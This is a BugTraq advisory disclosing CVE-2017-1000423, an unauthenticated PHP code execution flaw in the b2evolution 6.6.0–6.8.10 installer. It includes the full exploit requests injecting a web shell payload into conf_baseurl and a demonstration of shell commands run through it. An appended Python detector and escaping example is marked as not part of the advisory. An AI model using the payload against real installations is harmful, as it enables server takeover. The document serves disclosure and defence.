BugTraq
b2evolution CMS 6.6.0 - 6.8.10 PHP code execution Jan 02 2018 08:00AM
Anti Räis (antirais gmail com)
b2evolution CMS 6.6.0 - 6.8.10 PHP code execution
#################################################

Information
===========

Name: b2evolution CMS 6.8.10
Software: b2evolution CMS
Homepage: http://b2evolution.net/
Vulnerability: PHP code execution
Prerequisites: publicly accessible /install functionality
CVE: CVE-2017-1000423
Credit: Anti Räis
HTML version: https://bitflipper.eu

Description
===========

An unauthenticated user with access to the `/install` functionality can
configure the application installation parameters and complete the
installation. This functionality can be used to execute PHP code on the
server.

Proof of Concept
================

The application needs to be installed and configured after copying the
source code to the server. Once installation and configuration
(`/install`) is complete, the application creates a
`/conf/_basic_config.php` file. It contains database connection
credentials and other settings. An unauthenticated attacker with access to
the `/install` functionality can use it to execute PHP code by injecting it
into different values.

The following scenario demonstrates the issue on an Apache web server.

The following request is made after the base configuration is completed:
================[ src start ]================
POST /install/index.php HTTP/1.1
Host: victim.site
Content-Length: 214
Content-Type: application/x-www-form-urlencoded
Connection: close

conf_db_host=localhost&conf_db_name=b2evolution&conf_db_user=root&
conf_db_password=root&conf_baseurl=http%3A%2F%2Fvictim.site%2F&
conf_admin_email=admin%40localhost&submit=Update+config+file&
action=conf&locale=en-US
================[ src end ]==================

The application creates `/conf/_basic_config.php` using the user-supplied
values:

================[ src start ]================
...
/**
* MySQL DB settings.
* Fill in your database details (check carefully or nothing will work!)
*/
$db_config = array(
'user' => 'root', // your MySQL username
'password' => 'root', // ...and password
'name' => 'b2evolution', // the name of the database
'host' => 'localhost', // MySQL Server (typically 'localhost')
);
...
$baseurl = 'http://victim.site/';
...
$admin_email = 'admin@localhost';
...
================[ src end ]==================

If the application is installed on a public server, the installation
functionality is accessible to everyone who can reach the vulnerable site.
Assuming the attacker finds an application in this state, before the
initial installation is completed, they can use the previously described
request to execute PHP code on the victim's server.

The following parameters are vulnerable and can be used for this attack:
* conf_db_tableprefix
* conf_admin_email
* conf_baseurl

Let's use `conf_baseurl` as an example. The attacker specifies the
following value as the base URL:

================[ src start ]================
http://victim.site/\\';$r=$_REQUEST;if(isset($r[0])){$r[0]($r[1]);}/*
================[ src end ]==================

After finishing the basic setup, the following request is made.

================[ src start ]================
POST /install/index.php HTTP/1.1
Host: victim.site
Content-Length: 319
Content-Type: application/x-www-form-urlencoded
Connection: close

conf_db_host=localhost&conf_db_name=b2evolution&conf_db_user=root&
conf_db_password=root&
conf_baseurl=http%3A%2F%2Fvictim.site%2F%5C%5C%27%3B%24r%3D%24_REQUEST%3Bif
%28isset%28%24r%5B0%5D%29%29%7B%24r%5B0%5D%28%24r%5B1%5D%29%3B%7D%2F*&
conf_admin_email=admin%40localhost&submit=Update+config+file&action=conf&
locale=en-US
================[ src end ]==================

The application creates `/conf/_basic_config.php` using the
attacker-supplied values:

================[ src start ]================
...
/**
* MySQL DB settings.
* Fill in your database details (check carefully or nothing will work!)
*/
$db_config = array(
'user' => 'root', // your MySQL username
'password' => 'root', // ...and password
'name' => 'b2evolution', // the name of the database
'host' => 'localhost', // MySQL Server (typically 'localhost')
);
...
$baseurl = 'http://victim.site/\\';$r=$_REQUEST;if(isset($r[0])){$r[0]($r[1]);}/*/';
...
$admin_email = 'admin@localhost';
...
================[ src end ]==================

The attacker can use the PHP shell to execute code and take control of the
site:
view-source:http://victim.site/install/index.php?0=system&1=ls%20-lah;pwd

================[ src start ]================

total 676K
drwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:26 .
drwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:36 ..
-rw-rw-rw- 1 vagrant vagrant 60K Jul 23 00:26 _functions_create.php
-rw-rw-rw- 1 vagrant vagrant 2.2K Jul 23 00:26 _functions_delete.php
-rw-rw-rw- 1 vagrant vagrant 349K Jul 23 00:26 _functions_evoupgrade.php
-rw-rw-rw- 1 vagrant vagrant 60K Jul 23 00:26 _functions_install.php
-rw-rw-rw- 1 vagrant vagrant 14K Jul 23 00:26 automated-install.html
-rw-rw-rw- 1 vagrant vagrant 13K Jul 23 00:26 debug.php
-rw-rw-rw- 1 vagrant vagrant 831 Jul 23 00:26 index.html
-rw-rw-rw- 1 vagrant vagrant 52K Jul 23 00:26 index.php
-rw-rw-rw- 1 vagrant vagrant 16K Jul 23 00:26 license.txt
-rw-rw-rw- 1 vagrant vagrant 523 Jul 23 00:26 phpinfo.php
drwxrwxrwx 1 vagrant vagrant 4.0K Jul 23 00:26 test
/var/www/b2evolution/install
...
================[ src end ]==================
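The root cause is that the installer drops the submitted value verbatim between single quotes, so a value containing `\\'` closes the literal and whatever follows is parsed as PHP. The Python below is an added example, not code from the advisory or from b2evolution: it lexes a PHP single-quoted literal the way the PHP parser does, audits a `_basic_config.php` line for code trailing the closing quote (a check an incident responder can run over a suspect config file), and contrasts the naive writer with a `var_export()`-style escaped one. All function names are my own.

```python
import re

# Matches `$name = '...` or `'key' => '...` and stops on the opening quote.
ASSIGN_RE = re.compile(r"^\s*(?:\$(\w+)\s*=|'(\w+)'\s*=>)\s*(?=')")


def read_php_single_quoted(src, start):
    """Lex a PHP single-quoted literal beginning at src[start] == "'".
    Only \\ and \' are escapes; any other backslash is kept literally.
    Returns (decoded_value, index_after_closing_quote)."""
    out, i = [], start + 1
    while i < len(src):
        c = src[i]
        if c == "\\" and i + 1 < len(src) and src[i + 1] in "\\'":
            out.append(src[i + 1])
            i += 2
        elif c == "'":
            return "".join(out), i + 1
        else:
            out.append(c)
            i += 1
    raise ValueError("unterminated single-quoted string")


def audit_config_line(line):
    """Return (name, decoded_value, trailing_code) for a `$name = '...';`
    or `'key' => '...',` line, else None. trailing_code is anything after
    the closing quote except the `;`/`,` terminator and a `//` comment;
    if it is non-empty, the stored value broke out of its string literal."""
    m = ASSIGN_RE.match(line)
    if not m:
        return None
    name = m.group(1) or m.group(2)
    value, end = read_php_single_quoted(line, m.end())
    rest = line[end:].lstrip()
    if rest[:1] in (";", ","):
        rest = rest[1:].strip()
    if rest.startswith("//"):
        rest = ""
    return name, value, rest


def php_single_quote(value):
    """Escape like PHP's var_export() does for strings: backslash and
    single quote are the only characters that can end the literal."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def naive_config_line(name, value):
    """The unsafe pattern: raw value dropped between quotes (hypothetical)."""
    return "$%s = '%s';" % (name, value)


def safe_config_line(name, value):
    """The hardened writer: value escaped before it is embedded."""
    return "$%s = %s;" % (name, php_single_quote(value))
```

Running `audit_config_line` over every line of a deployed `_basic_config.php` and flagging any non-empty `trailing_code` is a cheap post-compromise check for this class of injection.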

Impact
======

An unauthenticated attacker can execute PHP code on the server. This can be
used to further compromise the site and hide the initial shell on the
server.

Conclusion
==========

Unrestricted access to the basic install functionality allows an
unauthenticated attacker to execute PHP code on the server and compromise
the site.

A new release has been made available to mitigate this issue:

* http://b2evolution.net/downloads/6-9-3

Timeline
========

* 08.08.2017 | me | vulnerability discovered
* 08.08.2017 | me > developer | contacted the developer
* 09.08.2017 | developer | vulnerability patched
* 12.08.2017 | me > DWF | CVE requested
* 12.08.2017 | me > developer | asked about patch release estimate
* 25.08.2017 | developer > public | new release with patch made available
* 31.08.2017 | me > public | full disclosure
* 29.12.2017 | DWF > me | CVE assigned

---
Anti Räis
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com
